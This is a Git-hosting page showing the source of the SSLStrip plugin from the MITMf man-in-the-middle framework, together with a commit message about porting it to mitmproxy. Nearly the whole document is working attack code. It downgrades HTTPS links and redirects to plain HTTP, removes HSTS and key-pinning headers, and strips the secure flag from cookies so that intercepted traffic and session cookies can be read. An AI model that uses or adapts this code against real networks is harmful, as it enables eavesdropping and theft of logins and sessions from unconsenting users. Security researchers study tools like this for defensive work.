github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-03-12 04:35:49 -07:00
Code Issues Packages Projects Releases Wiki Activity
MITMf/plugins/sslstrip.py
byt3bl33d3r eea5f53be2 Initial commit for v1.0 using mitmproxy instead of twisted 
Added a plugin system to Net-Creds so you can now add your own parsers,
api hook names might change between now and the offcial release
(will submit a PR to the original repo once completed)

The main MITM HTTP Proxy now uses mitmproxy which is a big deal, cuts
the code down by an insane amount, no more twisted! yay!

Basic plugin have been re-wrote for the new proxy engine

Since we are using mitmproxy we have out of the box support for SSL/TLS!
2016-02-06 13:27:08 -07:00

46 lines
1.7 KiB
Python
Raw Permalink Blame History

import re
from plugins.plugin import Plugin
from netlib.http import decoded
from six.moves import urllib
class SSLStrip(Plugin):
name = 'SSLStrip'
optname = 'sslstrip'
desc = 'Performs SSLStripping attacks on requested pages'
version = '1.0'
def initialize(self, context):
#set of SSL/TLS capable hosts
context.secure_hosts = set()
def request(self, context, flow):
flow.request.headers.pop('If-Modified-Since', None)
flow.request.headers.pop('Cache-Control', None)
#proxy connections to SSL-enabled hosts
if flow.request.pretty_host in context.secure_hosts :
flow.request.scheme = 'https'
flow.request.port = 443
def response(self, context, flow):
with decoded(flow.response) :
flow.request.headers.pop('Strict-Transport-Security', None)
flow.request.headers.pop('Public-Key-Pins', None)
#strip links in response body
flow.response.content = flow.response.content.replace('https://', 'http://')
#strip links in 'Location' header
if flow.response.headers.get('Location','').startswith('https://'):
location = flow.response.headers['Location']
hostname = urllib.parse.urlparse(location).hostname
if hostname:
context.secure_hosts.add(hostname)
flow.response.headers['Location'] = location.replace('https://', 'http://', 1)
#strip secure flag from 'Set-Cookie' headers
cookies = flow.response.headers.get_all('Set-Cookie')
cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
flow.response.headers.set_all('Set-Cookie', cookies)
Reference in New Issue View Git Blame Copy Permalink